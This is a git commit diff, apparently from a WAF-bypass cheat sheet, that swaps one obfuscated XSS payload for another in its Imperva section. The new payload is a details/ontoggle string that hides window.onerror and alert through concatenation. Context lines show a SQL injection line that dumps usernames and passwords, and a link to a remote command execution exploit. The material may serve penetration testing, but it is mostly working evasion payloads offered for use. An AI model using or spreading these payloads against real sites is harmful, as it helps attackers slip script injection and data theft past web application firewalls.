Added new Imperva WAF Bypasses

This commit is contained in:
Pinaki Mondal 2019-10-27 16:58:19 +05:30 committed by GitHub
parent 3ce797c5a4
commit 6cff31fe14
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -3598,9 +3598,9 @@ amUserId=1 union select username,password,3,4 from users
``` ```
### Imperva ### Imperva
- XSS Bypass by [@0xInfection](https://twitter.com/0xInfection) - [XSS Bypass](https://twitter.com/_ugurercan/status/1188406765735632896) by [@ugurercan](https://twitter.com/_ugurercan)
``` ```
<bleh/onclick=top[/al/.source+/ert/.source]&Tab;``>click <details/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];"/open>
``` ```
- [Imperva SecureSphere 13 - Remote Command Execution](https://www.exploit-db.com/exploits/45542) by [@rsp3ar](https://www.exploit-db.com/?author=9396) - [Imperva SecureSphere 13 - Remote Command Execution](https://www.exploit-db.com/exploits/45542) by [@rsp3ar](https://www.exploit-db.com/?author=9396)
- XSS Bypass by [@David Y](https://twitter.com/daveysec) - XSS Bypass by [@David Y](https://twitter.com/daveysec)